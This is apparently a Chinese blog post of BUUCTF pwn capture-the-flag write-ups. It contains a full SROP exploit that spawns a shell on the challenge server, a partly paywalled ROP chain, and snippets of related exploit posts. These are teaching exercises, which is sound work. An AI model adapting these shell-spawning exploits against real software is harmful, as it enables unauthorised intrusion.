BUUCTF pwn水题大赏(五)

最新推荐文章于 2023-04-17 20:25:03 发布
最新推荐文章于 2023-04-17 20:25:03 发布
阅读量302 收藏 1
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45878152/article/details/113617094
版权
本文详细介绍了多个CTF比赛中Pwn类型的题目,包括ciscn_2019_s_3、inndy_rop、护网杯_2018_gettingstart等,涉及栈溢出、ROP利用、内存修改等技术。通过提供exploit代码,揭示了如何利用漏洞获取权限,如利用浮点数内存存储特性、栈迁移和shellcode执行等。
摘要由CSDN通过智能技术生成

BUUCTF pwn水题大赏

ciscn_2019_s_3

srop ,要注意 rsp 指向的位置。
exp:

from pwn import*
context.log_level = 'DEBUG'
context.arch = 'amd64'
p = remote('node3.buuoj.cn',29369)
#p = process('./ciscn_s_3')
elf = ELF('./ciscn_s_3')

syscall_ret = 0x400517
start_addr = 0x04004ED
sigret = 0x4004DA
payload1 = '/bin/sh\x00'*2+p64(start_addr)
p.send(payload1)
sleep(0.1)
p.recv(0x20)
binsh = u64(p.recv(8))-0x118
print hex(binsh)
###gdb.attach(p)

exe = SigreturnFrame()
exe.rax = constants.SYS_execve
exe.rdi = binsh
exe.rsi = 0
exe.rdx = 0
exe.rip = syscall_ret

payload2='/bin/sh\x00'*2+p64(sigret)+p64(syscall_ret)+str(exe)
p.sendline(payload2)

p.interactive()

inndy_rop

很奇怪的一道题,简单的栈溢出,但是 rop 不需要自己写。
ROPgadget 有一个功能,可以直接构造 rop 链。

ROPgadget --binary rop --ropchain

exp:

from pwn import*
from struct import pack
context.log_level = 'DEBUG'

i=remote('node3.buuoj.cn',29638)
#i=process('./rop')
elf=ELF('./rop')

p = 'a'*16
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack(
最低0.47元/天 解锁文章
o琦野o
关注
专栏目录
[每日一PWN]BUUCTF PWN5
qq_55233040的博客
11-28 383
遇到了buu的pwn题中按顺序的第一道格式化字符串漏洞的题目,难度稍有提升。
BUUCTF的[第空间2019 决赛]PWN5
frist_csdn的博客
02-26 161
使用IDA打开 可以看到明显的格式化字符串漏洞 ,它是在bss段0x804c044存储了一个随机数,然后通过最后比较输入的passwd和随机数是否一样,如果一样就打开/bin/sh命令。 我的思路是,通过格式化字符串漏洞泄露0x804c044的数据,然后把得到的数据作为有符号的整数的字符串输入给nptr,然后程序会用atoi把字符串转换为整型。 在pwndbg中对程序调试,发现输入的buf和esp差距为0x28,所以是第十个格式化参数。 from pwn import * p = r
BUUCTF-pwn(5)
njh18790816639的博客
11-25 428
jarvisoj_level4 简单的ret2libc! from pwn import * from LibcSearcher import * context(log_level='debug',os='linux',arch='i386') r = remote('node4.buuoj.cn',25768) #r = process('./level4') elf = ELF('./level4') main = elf.symbols['main'] write_plt = elf.plt['
BUUCTF [第空间2019 决赛]PWN5
m0_54262894的博客
10-27 233
先checksec,开启了NX保护和Canary保护 也就意味着不能用栈溢出来攻击了 运行一下 放入ida中 查看main函数 我们可以看到只要令atoi(nptr) == dword_804C044就可以拿到权限 但dword_804C044是随机的,所以我们需要将它修改为我们想要的数据 看到了printf(buf); 说明存在格式化字符串漏洞 先计算偏移 我们可以算出偏移为10(从AAAA到41414141) ...
BUUCTF pwn水题大赏(三)
o琦野o的博客
02-03 387
BUUCTF pwn水题大赏21.铁人三项(第赛区)_2018_rop22.bjdctf_2020_babyrop23.[BJDCTF 2nd]r2t424.[BJDCTF 2nd]test25.bjdctf_2020_babystack226.bjdctf_2020_babyrop227.bjdctf_2020_router28.others_babystack29.ciscn_2019_s_430.wdb2018_guess 21.铁人三项(第赛区)_2018_rop 32位栈溢出,利用 write
BUUCTF pwn水题大赏(六)
o琦野o的博客
03-11 353
BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出,也不知道为啥会这么高分。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)
BUUCTF pwn水题大赏(七)(更新中)
o琦野o的博客
04-02 180
BUUCTF pwn水题大赏wustctf2020_getshell wustctf2020_getshell 简单 32 位栈溢出。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28411) #p=process('./wustctf2020_getshell') backdoor = 0x0804851B payload = 'a'*0x18+'a'*4+p32(backdoor) p.sen
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2113
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
[buuctf][第空间2019 决赛]PWN5
逆向萌新的博客
06-19 420
[buuctf][第空间2019 决赛]PWN5
BUUCTF-Pwn-[第空间2019 决赛]PWN5
餐桌上的猫
02-15 385
题目截图 检查文件信息 这是一个32位的程序,开启了NX和Canary 用IDA打开查看找到来能getshell的代码 反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell 测试我们输入的内容在栈中的位置,是第10个 exp from pwn import* r=remote('node4.buuoj.cn',28850) addr=
BUUCTF Pwn [第空间2019 决赛]PWN5
MrTreebook的博客
12-25 1007
BUUCTF Pwn [第空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入
BUUCTF-PWN-[第空间2019 决赛]PWN5
m0_64180167的博客
04-17 487
这题考到 格式化字符串的方法 我之前没有学过 根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护 nx打开 所以无法写入shellcode现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计 发现输入名字 他会返回名字 然后再输入密码 如果密码和unk_804c044一样 输出shellcode我们看看这个函数是什么搜索一下发现是随机数 这样我们就无法通过判断得到shellcode我们现在又两个方法。
BUUCTF--第空间决赛pwn5
sandyyyz的博客
10-13 440
给和我一样的pwn新手参考的一次简单的格式化字符串漏洞题解析过程
[BUUCTF-pwn]——[第空间2019 决赛]PWN5
Y_peak的博客
02-21 368
[BUUCTF-pwn]——[第空间2019 决赛]PWN5 题目地址:https://buuoj.cn/challenges#[第空间2019%20决赛]PWN5 题目: 这是一道格式化字符串的题,给大家讲解下 checksec一下看看, 开启了canary保护, 基本开启这个保护都会用到格式化字符串的漏洞。 在IDA中 利用pwndbg看看, 偏移是多少。 0xa也就是 10 思路 利用格式化字符串漏洞, 修改unk_804C044的值, 并且输入相等的值 exploit from p
[BUUCTF]PWN——[第空间2019 决赛]PWN5
BangSen1的博客
03-25 4777
[第空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
[BUUCTF]PWN5——ciscn_2019_n_1
mcmuyanga的博客
08-25 1769
[BUUCTF]4——ciscn_2019_n_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_n_1 步骤: 例行检查,64位,开启了nx保护 nc一下看看输入点的字符串,看运行结果猜测是一个猜数的程序,而且需要我们猜的数应该是11.28125 输入11.28125,发现还是不对 用64位ida打开,首先shift+f12查看程序里的字符串,发现了 “ cat /flag ” 双击跟进,ctrl+x找到调用这个字符串的函数 我们可以看到第10行的if
buuctf [第空间2019 决赛]PWN5 wp
Kata_Jhin的博客
01-27 282
buuctf [第空间2019 决赛]PWN5的wp
buuctf pwn空间决赛pwn5
最新发布
09-28
buuctf pwn空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值